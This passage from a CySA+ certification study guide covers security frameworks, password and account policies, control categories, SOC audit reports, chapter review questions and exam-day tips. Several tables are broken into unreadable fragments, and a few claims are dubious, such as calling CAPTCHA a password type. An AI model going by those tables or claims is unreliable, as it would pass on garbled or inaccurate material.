and its customers. An independent review of security controls
should be performed every three years. Table 21-4 shows the
ITIL v4 key components, ITIL service value system (SVS), and
the four dimensions model.
Maturity Models
Organizations are not alone in the wilderness when it comes to
developing processes for assessing vulnerability, selecting
controls, adjusting security policies and procedures to support
those controls, and performing audits. As described in the
sections that follow, several publications and process models
have been developed to help develop these skills. Maturity
models are used to determine where you are in the continual
improvement process as it relates to security and offer help in
reaching a higher level of improvement.
Table 21-3 SABSA Framework Matrix
Vie
wp
oin
ts
La
yer
Asse
ts
(Wh
at)
Motiv
ation
(Why
)
Proces
s
(How)
People
(Who)
Locati
on
(Wher
e)
Time
(Whe
n)
B
u
s
i
n
e
s
s
C
o
n
t
e
x
t
u
a
l
B
us
in
es
s
Ris
k
mo
del
Proc
ess
mod
el
Orga
nizati
ons
and
relati
onshi
ps
Geog
raph
y
Tim
e
dep
end
enci
es
A
r
c
h
i
t
e
c
t
C
o
n
c
e
p
t
u
a
l
B
us
in
es
s
at
tri
bu
te
s
pr
ofi
le
Con
trol
obje
ctiv
es
Secu
rity
strat
egies
and
archi
tectu
ral
layer
ing
Secur
ity
entit
y
mode
l and
trust
fram
ewor
k
Secu
rity
dom
ain
mod
el
Sec
urit
yrela
ted
lifet
ime
s
and
dea
dlin
es
D
e
s
i
g
n
e
r
L
o
g
i
c
a
l
B
us
in
es
s
in
fo
r
m
ati
on
m
od
el
Sec
urit
y
poli
cies
Secu
rity
servi
ces
Entit
y
sche
ma
and
privil
ege
profil
es
Secu
rity
dom
ain
defin
ition
s
and
asso
ciati
ons
Sec
urit
y
pro
cess
ing
cycl
e
B
u
i
l
d
e
r
P
h
y
s
i
c
a
l
B
us
in
es
s
da
ta
m
od
el
Sec
urit
y
rule
s,
pra
ctic
es,
and
pro
ced
ure
s
Secu
rity
mec
hani
sm
Users
,
appli
catio
ns,
and
interf
aces
Platf
orm
and
netw
ork
infra
struc
ture
Con
trol
stru
ctur
e
exe
cuti
on
T
r
a
d
e
s
m
a
n
C
o
m
p
o
n
e
n
t
D
et
ail
ed
da
ta
st
ru
ct
ur
es
Sec
urit
y
stan
dar
ds
Secu
rity
tools
and
prod
ucts
Ident
ities,
funct
ions,
actio
ns,
and
ACLs
Proc
esses
,
node
s,
addr
esses
, and
prot
ocols
Sec
urit
y
step
timi
ng
and
seq
uen
cing
F
a
c
i
l
i
t
i
e
s
m
a
n
a
g
e
r
O
p
e
r
a
t
i
o
n
a
l
O
pe
ra
ti
on
al
co
nt
in
ui
ty
as
su
ra
nc
e
Ope
rati
on
risk
ma
nag
eme
nt
Secu
rity
servi
ce
man
age
ment
and
supp
ort
Appli
catio
n and
user
mana
geme
nt
and
supp
ort
Site,
netw
ork,
and
platf
orm
secu
rity
Sec
urit
y
ope
rati
ons
sch
edu
le
Table 21-4 ITIL Version 4 Service Value System
ITIL
Service
Value
Chain
ITIL
Practices
ITIL
Guiding
Principles
Governance
Continu
al
Improv
ement
Plan
General
Managem
ent
Practices
Focus on
value
Engag
e
Service
Managem
ent
Practices
Start
where
you are
Desig
n and
Transi
tion
Technolog
y
Managem
ent
Practices
Progress
iteratively
with
feedback
Obtai
n/Buil
d
Collabora
te and
promote
visibility
Delive
r and
Suppo
rt
Think
and work
holisticall
y
Impro
ve
Keep it
simple
and
practical
Optimize
and
automate
CMMI
Directs
and
controls
the
organizatio
n
Seven
step
impro
vemen
t
The Capability Maturity Model Integration (CMMI) is
a comprehensive set of guidelines that address all phases of the
software development life cycle. It describes a series of stages,
or maturity levels, that a development process can advance
through as it goes from the ad hoc (Initial) model to one that
incorporates a budgeted plan for continuous improvement.
Figure 21-4 shows its five maturity levels.
Although the terms are used as synonyms in casual
conversation, accreditation and certification are two different
concepts in the context of assurance levels and ratings.
However, they are closely related. Certification evaluates the
technical system components, whereas accreditation occurs
when the adequacy of a system’s overall security is accepted by
management.
FIGURE 21-4 CMMI Maturity Levels Certification
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the 27001
standard, and it is one of the most popular standards by which
organizations obtain certification for information security. It is
covered in Chapter 20.
POLICIES AND PROCEDURES
Policies are broad statements of intent, while procedures are
details used to carry out that intent. Both mechanisms are used
to guide an organization’s effort with regard to security or any
activity over which the organization wishes to gain control. A
security policy should cover certain items, and it should be
composed of a set of documents that ensure that key
components are secured. The following sections cover the key
policies and procedures that should be created and included in a
security policy.
Code of Conduct/Ethics
A code of conduct/ethics policy is one intended to
demonstrate a commitment to ethics in the activities of the
principles. It is typically a broad statement of commitment that
is supported by detailed procedures designed to prevent
unethical activities. For example, the statement might be “We
commit to the highest ethical standards in our dealings with
others.” Supporting this would be a procedure that prohibits the
acceptance or offer of gifts during a sales negotiation.
Personnel hiring procedures should include signing all the
appropriate documents, including government-required
documentation, no expectation of privacy statements, and nondisclosure agreements (NDAs). Organizations usually have a
personnel handbook and other hiring information that must be
communicated to the employee. The hiring process should
include a formal verification that the employee has completed
all the training. Employee IDs and passwords are issued at this
time.
Code of conduct, conflict of interest, and ethics agreements
should also be signed at this time. Also, any non-compete
agreements should be verified to ensure that employees do not
leave the organization for a competitor. Employees should be
given guidelines for periodic performance reviews,
compensation, and recognition of achievements.
Acceptable Use Policy (AUP)
An acceptable use policy (AUP) is used to inform users of
the actions that are allowed and those that are not allowed. It
should also provide information on the consequences that may
result when these policies are violated. This document should
be reviewed and signed by each user during the employee
orientation phase of the employment process. The following are
examples of the many issues that may be addressed in an AUP:
Proprietary information stored on electronic and computing
devices, whether owned or leased by company, the employee, or a
third party, remains the sole property of company.
The employee has a responsibility to promptly report the theft, loss,
or unauthorized disclosure of proprietary information.
Access, use, or sharing of proprietary information is allowed only to
the extent that it is authorized and necessary to fulfill assigned job
duties.
Employees are responsible for exercising good judgment regarding
the reasonableness of personal use.
Authorized individuals in the company may monitor equipment,
systems, and network traffic at any time.
The company reserves the right to audit networks and systems on a
periodic basis to ensure compliance with this policy.
All mobile and computing devices that connect to the internal
network must comply with the company access policy.
System-level and user-level passwords must comply with the
password policy.
All computing devices must be secured with a password-protected
screensaver.
Postings by employees from a company e-mail address to
newsgroups should contain a disclaimer stating that the opinions
expressed are strictly their own and not necessarily those of
company.
Employees must use extreme caution when opening e-mail
attachments received from unknown senders, which may contain
malware.
Password Policy
Password authentication is the most popular authentication
method implemented today. But often password types can vary
from system to system. Before we look at potential password
policies, it is vital that you understand all the types of passwords
that can be used. Some of the types of passwords that you
should be familiar with include the following:
Standard word passwords: As the name implies, these
passwords consist of single words that often include a mixture of
upper- and lowercase letters. The advantage of this password type is
that it is easy to remember. A disadvantage of this password type is
that it is easy for attackers to crack or break, resulting in
compromised accounts.
Combination passwords: These passwords, also called
composition passwords, use a mix of dictionary words, usually two
that are unrelated. Like standard word passwords, they can include
upper- and lowercase letters and numbers. An advantage of this
password type is that it is harder to break than a standard word
password. A disadvantage is that it can be hard to remember.
Static passwords: This password type is the same for each login.
It provides a minimum level of security because the password never
changes. It is most often seen in peer-to-peer networks.
Complex passwords: This password type forces a user to include
a mixture of upper- and lowercase letters, numbers, and special
characters. For many organizations today, this type of password is
enforced as part of the organization’s password policy. An
advantage of this password type is that it is very hard to crack. A
disadvantage is that it is harder to remember and can often be
much harder to enter correctly.
Passphrase passwords: This password type requires that a long
phrase be used. Because of the password’s length, it is easier to
remember but much harder to attack, both of which are definite
advantages. Incorporating upper- and lowercase letters, numbers,
and special characters in this type of password can significantly
increase authentication security.
Cognitive passwords: This password type is a piece of
information that can be used to verify an individual’s identity. The
user provides this information to the system by answering a series
of questions based on her life, such as favorite color, pet’s name,
mother’s maiden name, and so on. An advantage of this type is that
users can usually easily remember this information. The
disadvantage is that someone who has intimate knowledge of the
person’s life (spouse, child, sibling, and so on) may be able to
provide this information as well.
One-time passwords (OTPs): Also called a dynamic password,
an OTP is used only once to log in to the access control system. This
password type provides the highest level of security because it is
discarded after it is used once.
Graphical passwords: Also called CAPTCHA passwords (an
acronym for Completely Automated Public Turing test to tell
Computers and Humans Apart), this type of password uses graphics
as part of the authentication mechanism. One popular
implementation requires a user to enter a series of characters that
appear in a graphic. This implementation ensures that a human, not
a machine, is entering the password. Another popular
implementation requires the user to select the appropriate graphic
for his account from a list of graphics.
Numeric passwords: This type of password includes only
numbers. Keep in mind that the choices of a password are limited
by the number of digits allowed. For example, if all passwords are
four digits, then the maximum number of password possibilities is
10,000, from 0000 through 9999. Once an attacker realizes that
only numbers are used, cracking user passwords is much easier
because the attacker knows the possibilities.
The simpler types of passwords are considered weaker than
passphrases, one-time passwords, token devices, and login
phrases. Once an organization has decided which type of
password to use, the organization must establish its password
management policies. Password management considerations
include, but may not be limited to, the following:
Password life: How long a password will be valid. For most
organizations, passwords are valid for 60 to 90 days.
Password history: How long before a password can be reused.
Password policies usually remember a certain number of previously
used passwords.
Authentication period: How long a user can remain logged in. If
a user remains logged in for the specified period without activity,
the user will be automatically logged out.
Password complexity: How the password will be structured.
Most organizations require upper- and lowercase letters, numbers,
and special characters. The following are some recommendations:
Passwords shouldn’t contain the username or parts of the user’s
full name, such as his first name.
Passwords should use at least three of the four available
character types: lowercase letters, uppercase letters, numbers,
and symbols.
Password length: How long the password must be. Most
organizations require 8 to 12 characters.
As part of password management, an organization should
establish a procedure for changing passwords. Most
organizations implement a service that allows users to
automatically reset a password before the password expires. In
addition, most organizations should consider establishing a
password reset policy that addresses situations in which users
forget their passwords or their passwords are compromised. A
self-service password reset approach allows users to reset their
own passwords, without the assistance of help desk employees.
An assisted password reset approach requires that users contact
help desk personnel for help changing passwords.
Password reset policies can also be affected by other
organizational policies, such as account lockout policies.
Account lockout policies are security policies that organizations
implement to protect against attacks carried out against
passwords. Organizations often configure account lockout
policies so that user accounts are locked after a certain number
of unsuccessful login attempts. If an account is locked out, the
system administrator may need to unlock or reenable the user
account. Security professionals should also consider
encouraging organizations to require users to reset their
passwords if their accounts have been locked. For most
organizations, all the password policies, including account
lockout policies, are implemented at the enterprise level on the
servers that manage the network.
Depending on which servers are used to manage the enterprise,
security professionals must be aware of the security issues that
affect user accounts and password management. Two popular
server operating systems are Linux and Windows.
For Linux, passwords are stored in the /etc/passwd or
/etc/shadow file. Because the /etc/passwd file is a text file that
can be easily accessed, you should ensure that any Linux servers
use the /etc/shadow file, where the passwords in the file can be
protected using a hash. The root user in Linux is a default
account that is given administrative-level access to the entire
server. If the root account is compromised, all passwords should
be changed. Access to the root account should be limited only to
system administrators, and root login should be allowed only
via a system console.
Data Ownership
A data ownership policy is closely related to a data classification
policy (covered in Chapter 13, “The Importance of Proactive
Threat Hunting”), and often the two policies are combined. This
is because typically the data owner is tasked with classifying the
data. Therefore, the data ownership policy covers how the
owner of each piece of data or each data set is identified. In
most cases, the creator of the data is the owner, but some
organizations may deem all data created by a department to be
owned by the department head. Another way a user may
become the owner of data is by introducing into the
organization data the user did not create. Perhaps the data was
purchased from a third party. In any case, the data ownership
policy should outline both how data ownership occurs and the
responsibilities of the owner with respect to determining the
data classification and identifying those with access to the data.
Data Retention
A data retention policy outlines how various data types must be
retained and may rely on the data classifications described in
the data classification policy. Data retention requirements vary
based on several factors, including data type, data age, and legal
and regulatory requirements. Security professionals must
understand where data is stored and the type of data stored. In
addition, security professionals should provide guidance on
managing and archiving data securely. Therefore, each data
retention policy must be established with the help of
organizational personnel.
A data retention policy usually identifies the purpose of the
policy, the portion of the organization affected by the policy, any
exclusions to the policy, the personnel responsible for
overseeing the policy, the personnel responsible for data
destruction, the data types covered by the policy, and the
retention schedule. Security professionals should work with
data owners to develop the appropriate data retention policy for
each type of data the organization owns. Examples of data types
include, but are not limited to, human resources data, accounts
payable/receivable data, sales data, customer data, and e-mail.
To design a data retention policy, an organization should
answer the following questions:
What are the legal/regulatory requirements and business needs for
the data?
What are the types of data?
What are the retention periods and destruction needs of the data?
The personnel who are most familiar with each data type should
work with security professionals to determine the data retention
policy. For example, human resources personnel should help
design the data retention policy for all human resources data.
While designing a data retention policy, the organization must
consider the media and hardware that will be used to retain the
data. Then, with this information in hand, the data retention
policy should be drafted and formally adopted by the
organization and/or business unit.
Once a data retention policy has been created, personnel must
be trained to comply with it. Auditing and monitoring should be
configured to ensure data retention policy compliance.
Periodically, data owners and processors should review the data
retention policy to determine whether any changes need to be
made. All data retention policies, implementation plans,
training, and auditing should be fully documented.
Remember that for most organizations, a one-size-fits-all
solution is impossible because of the different types of data.
Only those most familiar with each data type can determine the
best retention policy for that data. While a security professional
should be involved in the design of the data retention policies,
the security professional is there to ensure that data security is
always considered and that data retention policies satisfy
organizational needs. The security professional should only act
in an advisory role and should provide expertise when needed.
Account Management
The account management policy helps guide the management of
identities and accounts. Identity and account management is
vital to any authentication process. As a security professional,
you must ensure that your organization has a formal procedure
to control the creation and allocation of access credentials or
identities. If invalid accounts are allowed to be created and are
not disabled, security breaches will occur. Most organizations
implement a method to review the identification and
authentication process to ensure that user accounts are current.
Answering questions such as the following is likely to help in the
process:
Is a current list of authorized users and their access maintained and
approved?
Are passwords changed at least every 90 days—or earlier, if needed?
Are inactive user accounts disabled after a specified period of time?
Any identity management procedure must include processes for
creating (provisioning), changing and monitoring (reviewing),
and removing users from the access control system (revoking).
This is referred to as the access control provisioning life cycle.
When initially establishing a user account, new users should be
required to provide valid photo identification and should sign a
statement regarding password confidentiality. User accounts
must be unique. Policies should be in place to standardize the
structure of user accounts. For example, all user accounts
should be firstname.lastname or some other structure. This
ensures that users in an organization will be able to determine a
new user’s identification, mainly for communication purposes.
After creation, user accounts should be monitored to ensure
that they remain active. Inactive accounts should be
automatically disabled after a certain period of inactivity, based
on business requirements. In addition, any termination policy
should include formal procedures to ensure that all user
accounts are disabled or deleted. Elements of proper account
management include the following:
Establish a formal process for establishing, issuing, and closing user
accounts.
Periodically review user accounts.
Implement a process for tracking access authorization.
Periodically rescreen personnel in sensitive positions.
Periodically verify the legitimacy of user accounts.
User account reviews are a vital part of account management.
User accounts should be reviewed for conformity with the
principle of least privilege. This principle specifies that users
should only be given the rights and permission required to do
their job and no more. User account reviews can be performed
on an enterprise wide, systemwide, or application-byapplication basis. The size of the organization greatly affects
which of these methods to use. As part of user account reviews,
organizations should determine whether all user accounts are
active.
Continuous Monitoring
To support the enforcement of a security policy and its various
parts, operations procedures should be defined and practiced on
a daily basis. One of the most common operational procedures
that should be defined is continuous monitoring. Before
continuous monitoring can be successful, an organization must
ensure that operational baselines are captured. After all, an
organization cannot recognize abnormal patterns or behavior if
it doesn’t know what “normal” is. These baselines should also be
revisited periodically to ensure that they have not changed. For
example, if a single web server is upgraded to a web server farm,
a new performance baseline should be captured.
Security analysts must ensure that the organization’s security
posture is maintained at all times. This requires continuous
monitoring. Auditing and security logs should be reviewed on a
regular schedule. Performance metrics should be compared to
baselines. Even simple acts such as normal user login/logout
times should be monitored. If a user suddenly starts logging in
and out at irregular times, the user’s supervisor should be
alerted to ensure that the user is authorized. Organizations
must always be diligent in monitoring the security of the
enterprise.
An example of a continuous monitoring tool is Security
Compliance Toolkit (SCT). This tool can be used to monitor
compliance with a baseline. It works with two other Microsoft
tools: Group Policy and Microsoft Endpoint Configuration
Manager (MESCM).
Work Product Retention
Work product is anything you complete for a person or business
that has hired you. Organizations need a clear work product
retention policy that defines all work product as property of
the organization and not of the worker who created the product.
This requires employees to sign an agreement to that effect at
time of employment.
CATEGORY
Control categories refer to how the control responds to the
issue, while the control type refers to how the control is
implemented. There are three control categories, managerial (or
administrative), operational, and technical. Control types are
covered in the following “Control Type” section.
Managerial
Managerial controls (also called administrative controls)
are implemented to administer the organization’s assets and
personnel and include security policies, procedures, standards,
baselines, and guidelines that are established by management.
These controls are commonly referred to as soft controls.
Specific examples are personnel controls, data classification,
data labeling, security awareness training, and supervision.
Security awareness training is a very important administrative
control. Its purpose is to improve the organization’s attitude
about safeguarding data. The benefits of security awareness
training include reduction in the number and severity of errors
and omissions, better understanding of information value, and
better administrator recognition of unauthorized intrusion
attempts. A cost-effective way to ensure that employees take
security awareness seriously is to create an award or recognition
program.
Operational
Operational controls are measures that are made part of the
organizational security stance day to day. These controls include
the following control types:
Directive controls: Specify acceptable practice within an
organization. They are in place to formalize an organization’s
security directive mainly to its employees. The most popular
directive control is an acceptable use policy (AUP), which lists
proper (and often examples of improper) procedures and behaviors
that personnel must follow. Any organizational security policies or
procedures usually fall into this access control category. You should
keep in mind that directive controls are efficient only if there is a
stated consequence for not following the organization’s directions.
Deterrent controls: Deter or discourage an attacker. Via
deterrent controls, attacks can be discovered early in the process.
Deterrent controls often trigger preventive and corrective controls.
Examples of deterrent controls include user identification and
authentication, fences, lighting, and organizational security policies,
such as an NDA.
Technical
Technical controls (also called logical controls) are software
or hardware components used to restrict access. Specific
examples of logical controls are firewalls, IDSs, IPSs,
encryption, authentication systems, protocols, auditing and
monitoring, biometrics, smart cards, and passwords.
An example of implementing a technical control is adopting a
new security policy that forbids employees from remotely
configuring the e-mail server from a third party’s location
during work hours.
Although auditing and monitoring are logical controls and are
often listed together, they are actually two different controls.
Auditing is a one-time or periodic event to evaluate security.
Monitoring is an ongoing activity that examines either the
system or users.
CONTROL TYPE
Controls are implemented as countermeasures to identified
vulnerabilities. Control mechanisms are divided into six types,
as explained in this section. Control type refers to how the
control is implemented.
Preventative
Preventative controls (or preventive controls) prevent an
attack from occurring. Examples of preventive controls include
locks, badges, biometric systems, encryption, IPSs, antivirus
software, personnel security, security guards, passwords, and
security awareness training.
Detective
Detective controls are in place to detect an attack while it is
occurring to alert appropriate personnel. Examples of detective
controls include motion detectors, IDSs, logs, guards,
investigations, and job rotation.
Corrective
Corrective controls are in place to reduce the effect of an
attack or other undesirable event. Using corrective controls
fixes or restores the entity that is attacked. Examples of
corrective controls include installing fire extinguishers, isolating
or terminating a connection, implementing new firewall rules,
and using server images to restore to a previous state.
Deterrent
Deters or discourages an attacker. Via deterrent controls,
attacks can be discovered early in the process. Deterrent
controls often trigger preventive and corrective controls.
Examples of deterrent controls include user identification and
authentication, fences, lighting, and organizational security
policies, such as an NDA.
Directive
Specifies acceptable practice within an organization. They are in
place to formalize an organization’s security directive mainly to
its employees. The most popular directive control is an
acceptable use policy (AUP), which lists proper (and often
examples of improper) procedures and behaviors that personnel
must follow. Any organizational security policies or procedures
usually fall into this access control category. You should keep in
mind that directive controls are efficient only if there is a stated
consequence for not following the organization’s directions.
Physical
Physical controls are implemented to protect an
organization’s facilities and personnel. Personnel concerns
should take priority over all other concerns. Specific examples
of physical controls include perimeter security, badges, swipe
cards, guards, dogs, mantraps, biometrics, and cabling.
AUDITS AND ASSESSMENTS
Assessing vulnerability, selecting controls, and adjusting
security policies and procedures to support those controls
without performing verification and quality control are
somewhat like driving without a dashboard. Just as you would
have no information about the engine temperature, speed, and
fuel level, you would be unable to determine whether your
efforts are effective.
Audits differ from internal assessments in that they are usually
best performed by a third party. An organization should
conduct internal and third-party audits as part of any security
assessment and testing strategy. An audit should test all
security controls that are currently in place. Some guidelines to
consider as part of a good security audit plan include the
following:
At minimum, perform annual audits to establish a security baseline.
Determine your organization’s objectives for the audit and share
them with the auditors.
Set the ground rules for the audit before the audit starts, including
the dates/times of the audit.
Choose auditors who have security experience.
Involve business unit managers early in the process.
Ensure that auditors rely on experience, not just checklists.
Ensure that the auditor’s report reflects risks that your organization
has identified.
Ensure that the audit is conducted properly.
Ensure that the audit covers all systems and all policies and
procedures.
Examine the report when the audit is complete.
Audits and assessments can fall into two categories, which are
covered in the following sections.
Regulatory
Many regulations today require that audits occur. Organizations
used to rely on Statement on Auditing Standards (SAS) 70,
which provided auditors information and verification about
data center controls and processes related to the data center
user and financial reporting. In 2011, the Statement on
Standards for Attestation Engagements (SSAE) No. 16 took the
place of SAS 70 as the authoritative standard for auditing
service organizations and was subsequently updated to version
18. These audits verify that the controls and processes set in
place by a data center are actually followed. The Statement on
Standards for Attestation Engagements (SSAE) 18 is a standard
that verifies the controls and processes and also requires a
written assertion regarding the design and operating
effectiveness of the controls being reviewed.
An SSAE 18 audit results in a Service Organization Control
(SOC) 1 report. This report focuses on internal controls over
financial reporting. There are two types of SOC 1 reports:
SOC 1, Type 1 report: Focuses on the auditors’ opinion of the
accuracy and completeness of the data center management’s design
of controls, system, and/or service.
SOC 1, Type 2 report: Includes Type 1 and an audit on the
effectiveness of controls over a certain time period, normally
between six months and a year.
Two other report types are also available: SOC 2 and SOC 3.
Both of these audits provide benchmarks for controls related to
the security, availability, processing integrity, confidentiality, or
privacy of a system and its information. A SOC 2 report includes
service auditor testing and results, and a SOC 3 report provides
only the system description and auditor opinion. A SOC 3 report
is for general use and provides a level of certification for data
center operators that assures data center users of facility
security, high availability, and process integrity. Table 21-5
briefly compares the three types of SOC reports. Included in the
table are two new report types as well.
Table 21-5 SOC Report Comparison Chart
Report Type
What It Reports On
Who Uses It
SOC
1
Internal controls over
financial reporting
User auditors and
users’ controller office
SOC
2
Security, availability,
processing integrity,
confidentiality, or privacy
controls
Management,
regulators, and others;
shared under
nondisclosure
agreement (NDA)
SOC
3
Security, availability,
processing integrity,
confidentiality, or privacy
controls
Publicly available to
anyone
SOC
for
Cybe
rsecu
rity
An organization’s efforts to
prevent, monitor, and
effectively handle any
cybersecurity threats
Management and
practitioners
SOC
Cons
ultin
g&
Read
iness
The controls it currently has
in place, while also
preparing it for the actual
execution of a SOC report
Management and
practitioners
Compliance
No organization operates within a bubble. All organizations are
affected by laws, regulations, and compliance requirements.
Security analysts must understand the laws and regulations of
the country or countries they are working in and the industry
within which they operate. In many cases, laws and regulations
prescribe how specific actions must be taken. In other cases,
laws and regulations leave it up to the organization to determine
how to comply. Significant pieces of legislation that can affect
an organization and its security policy are covered in Chapter
19.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 21-6
lists a reference of these key topics and the page numbers on
which each is found.
Table 21-6 Key Topics in Chapter 21
Key Topic Element
Description
Page Number
Table 21-2
NIST SP 800-53 Rev 4 control families
552
Bulleted list
TOGAF domains
554
Figure 21-2
TOGAF ADM model
554
Bulleted list
NIST Cybersecurity Framework
555
Bulleted list
The ISO/IEC 27000 Series
556
Table 21-3
SABSA framework matrix
560
Table 21-4
ITIL v4 service value system
561
Figure 21-4
CMMI maturity levels
562
Bulleted list
Issues that may be addressed in an AUP
563
Bulleted list
Password types
564
Bulleted list
Password management policies
566
Section
Control types
571
Table 21-5
SOC report comparison chart
574
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
frameworks
NIST SP 800-53
COBIT
The Open Group Architecture Framework (TOGAF)
NIST Cybersecurity Framework version 1.1
ISO/IEC 27000 Series
SABSA
ITIL
maturity models
Capability Maturity Model Integration (CMMI)
certification
accreditation
National Information Assurance Certification and
Accreditation Process (NIACAP)
ISO/IEC 27001:2013
code of conduct/ethics
acceptable use policy (AUP)
standard word passwords
combination passwords
static passwords
complex passwords
passphrase passwords
cognitive passwords
one-time passwords (OTPs)
graphical passwords
numeric passwords
password life
password history
authentication period
password complexity
password length
work product retention
managerial (administrative type) controls
operational controls
directive controls
deterrent controls
technical controls
physical controls
preventative controls
detective controls
corrective controls
SOC 1 Type 1 report
SOC 1 Type 2 report
REVIEW QUESTIONS
1. ________________ is a security controls development
framework developed by NIST.
2. List the family and class of at least two of the NIST SP 80053 control families.
3. Match the following terms with their definitions.
Terms
Definitions
Code of
conduct/ethi
cs
Divides the controls into three classes: technical,
operational, and management
Acceptable
use policy
Work done for and owned by the organization
Work
product
retention
Describes what can be done by users
NIST SP
800-53
Details standards of business conduct
4. List at least two guidelines to consider as part of a good
security audit plan.
5. List at least one SOC report, including what it reports on
and who uses it.
6. Match the following terms with their definitions.
Terms
Definitions
Control Objectives
for Information
and Related
Technology
(COBIT)
Focuses exclusively on IT security
The Open Group
Architecture
Framework
(TOGAF)
An enterprise architecture framework that
helps organizations design, plan,
implement, and govern an enterprise
information architecture
NIST
Cybersecurity
Framework
A security program development standard
on how to develop and maintain an
information security management system
(ISMS)
ISO/IEC 27000
Series
Security controls development framework
that uses a process model to subdivide IT
into four domains
7. _______________________ controls are software or
hardware components used to restrict access.
8. List and define at least two password policies.
9. Match the following terms with their definitions.
Terms
Sherwood
Applied
Business
Definitions
Comprehensive set of guidelines that address
all phases of the software development life cycle
Security
Architecture
(SABSA)
Information
Technology
Infrastructure
Library (ITIL)
Provides a standard set of activities, general
tasks, and a management structure to certify
and accredit systems that maintain the
information assurance and security posture of a
system or site
Capability
Maturity
Model
Integration
(CMMI)
Enterprise security architecture framework that
uses the six communication questions (What,
Where, When, Why, Who, and How) that
intersect with six layers (operational,
component, physical, logical, conceptual, and
contextual)
National
Information
Assurance
Certification
and
Accreditation
Process
(NIACAP)
Process management development standard
developed by the Office of Management and
Budget in OMB Circular A-130
10. A(n) ______________________ policy is one intended
to demonstrate a commitment to ethics in the activities of
the principles.
Chapter 22
Final Preparation
The purpose of this chapter is to demystify the certification
preparation process for you. This includes taking a more
detailed look at the actual certification exam itself. This chapter
shares some helpful ideas on ensuring that you are ready for the
exam. Many people become anxious about taking exams, so this
chapter gives you the tools to build confidence for exam day.
The first 21 chapters of this book cover the technologies,
protocols, design concepts, and considerations required to be
prepared to pass the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 exam. While these chapters supply the detailed
information, most people need more preparation than just
reading the first 21 chapters of this book. This chapter details a
set of tools and a study plan to help you complete your
preparation for the exams.
This short chapter has four main sections. The first section lists
the CompTIA CySA+ CS0-002 exam information and
breakdown. The second section shares some important tips to
keep in mind to ensure you are ready for this exam. The third
section discusses exam preparation tools useful at this point in
the study process. The final section of this chapter lists a
suggested study plan now that you have completed all the
earlier chapters in this book.
Note
Appendix C, “Memory Tables,” and Appendix D, “Memory Tables Answer Key,”
exist as soft-copy appendixes on the website for this book, which you can
access by going to https://www.pearsonITcertification.com/register, registering
your book, and entering this book’s ISBN: 9780136747161.
EXAM INFORMATION
Here are details you should be aware of regarding the exam that
maps to this text.
Exam code: CS0-002
Question types: Multiple-choice and performance-based
questions
Number of questions: Maximum of 85
Time limit: 165 minutes
Required passing score: 750 (on a scale of 100 to 900)
Exam fee (subject to change): $359.00 USD
Note
The following information is copied from the CompTIA CySA+ web page.
As attackers have learned to evade traditional signature-based
solutions, such as firewalls and anti-virus software, an
analytics-based approach within the IT security industry is
increasingly important for organizations. CompTIA CySA+
applies behavioral analytics to networks to improve the overall
state of security through identifying and combating malware
and advanced persistent threats (APTs), resulting in an
enhanced threat visibility across a broad attack surface. It will
validate an IT professional’s ability to proactively defend and
continuously improve the security of an organization. CySA+
will verify the successful candidate has the knowledge and skills
required to
Leverage intelligence and threat detection techniques
Analyze and interpret data
Identify and address vulnerabilities
Suggest preventative measures
Effectively respond to and recover from incidents
GETTING READY
Here are some important tips to keep in mind to ensure that
you are ready for this rewarding exam:
Note
Recently CompTIA has expanded its online testing offerings to include the
CySA+ exam. For information on this option see
https://www.comptia.org/testing/testing-options/take-online-exam.
Build and use a study tracker: Consider taking the exam
objectives and building a study tracker. This can be a notebook
outlining the objectives, with your notes written out. Using pencil
and paper can help concentration by making you take the time to
think about potential answers to questions that might be asked on
the exam for each objective. A study tracker will help ensure that
you have not missed anything and that you are confident for your
exam. There are other ways, including a sample Study Planner as a
website supplement to this book (Appendix E). Whatever works
best for you is the right option to use.
Think about your time budget for questions in the exam:
When you do the math, you realize that you have a bit less than 2
minutes per exam question. While this does not sound like enough
time, keep in mind that many of the questions will be very
straightforward, and you will take 15 to 30 seconds on those. This
builds time for other questions as you take your exam.
Watch the clock: Periodically check the time remaining as you
are taking the exam. You might even find that you can slow down
pretty dramatically if you have built up a nice block of extra time.
Consider ear plugs: Some people are sensitive to noise when
concentrating. If you are one of them, ear plugs may help. There
might be other test takers in the center with you and you do not
want to be distracted by them.
Plan your travel time: Give yourself extra time to find the center
and get checked in. Be sure to arrive early. As you test more at that
center, you can certainly start cutting it closer time-wise.
Get rest: Most students report success with getting plenty of rest
the night before the exam. All-night cram sessions are not typically
successful.
Bring in valuables but get ready to lock them up: The testing
center will take your phone, your smart watch, your wallet, and
other such items and will provide a secure place for them.
Use the restroom before going in: If you think you will need a
break during the test, clarify the rules with the test proctor.
Take your time getting settled: Once you are seated, take a
breath and organize your thoughts. Remind yourself that you have
worked hard for this opportunity and expect to do well. The 165minute timer doesn’t start until you tell it to after a brief tutorial.
The timer starts when you agree to see the first question.
Take notes: You will be given note-taking materials, so take
advantage of them. Sketch out lists and mnemonics that you
memorized. The note paper can be used for any calculations you
need, but it is okay to write notes to yourself before beginning.
Practice exam questions are great—so use them: This text
provides many practice exam questions. Be sure to go through them
thoroughly. Remember, you shouldn’t blindly memorize answers;
instead, let the questions really demonstrate where you are weak in
your knowledge and then study up on those areas.
TOOLS FOR FINAL PREPARATION
This section lists some information about the available tools and
how to access the tools.
Pearson Test Prep Practice Test Software and Questions
on the Website
Register this book to get access to the Pearson Test Prep
practice test software (software that displays and grades a set of
exam-realistic, multiple-choice questions). Using the Pearson
Test Prep practice test software, you can either study by going
through the questions in Study mode or take a simulated
(timed) CySA+ exam.
The Pearson Test Prep practice test software comes with two
full practice exams. These practice tests are available to you
either online or as an offline Windows application. To access the
practice exams that were developed with this book, please see
the instructions in the card inserted in the sleeve in the back of
the book. This card includes a unique access code that enables
you to activate your exams in the Pearson Test Prep software.
You will find detailed instructions for accessing the Pearson
Test Prep software in the Introduction to this book.
Memory Tables
Like most exam Cert Guides, this book purposely organizes
information into tables and lists for easier study and review.
Rereading these tables and lists can be very useful before the
exam. However, it is easy to skim over the tables without paying
attention to every detail, especially when you remember having
seen the table’s contents when reading the chapter.
